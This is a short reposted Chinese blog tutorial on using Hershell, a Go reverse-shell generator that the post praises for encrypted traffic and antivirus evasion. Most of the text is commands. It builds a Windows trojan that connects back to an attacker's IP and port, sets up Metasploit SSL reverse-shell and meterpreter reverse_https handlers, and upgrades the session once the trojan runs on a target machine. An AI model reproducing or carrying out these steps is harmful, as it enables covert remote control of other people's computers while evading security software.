转自:https://www.cnblogs.com/Chuantouli/p/12298579.html
简介 Hershell
1 |
Hershell(<a href= "github.com/sysdream/hershell" target= "_blank" rel= "noopener" >github.com/sysdream/hershell</a>)是基于golang开发的一款反向shell生成器,跨平台、流量加密、免杀效果较好
|
环境配置
安装golang,go get下载源码,切换到其目录
1 |
<em id= "__mceDel" >yum install golang<br>cd $HOME/go<br>go get github.com/sysdream/hershell<br>cd /root/go/src/github.com/sysdream/hershell</em>
|
使用操作
1、生成证书
1 |
make depends
|
2、生成客户端,运行后会生成hershell.exe,针对其不同平台使用不同方法的生成,修改其参数即可
1 |
make windows32 LHOST=服务端IP LPORT=监听端口
|
3、直接使用msf进行反连
1 |
use exploit/multi/handler<br> set payload python/shell_reverse_tcp_ssl<br> set lhost 服务端IP<br> set lport 服务端端口<br> set HandlerSSLCert ./server.pem<br>exploit -j
|
4、靶机运行客户端木马,成功上线
5、hershell的shell自带没有很多功能,最好还是切换到强大的后渗透模块meterpreter,这里本来想使用session -u直接升级会话的,奈何没升级成功
6、另开一个会话启动msf监听
1 2 3 4 5 6 |
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 服务端ip
set lport 服务端端口
set HandlerSSLCert ./server.pem
exploit -j
|
7、hershell使用内置的meterpreter模块迁移,直接退出了会话,这里没明白为什么,和上面session转会话一样,感觉有点玄学,总之,这两种两种都可以来变成meterpreter会话
1 |
meterpreter https 服务端ip:服务端端口
|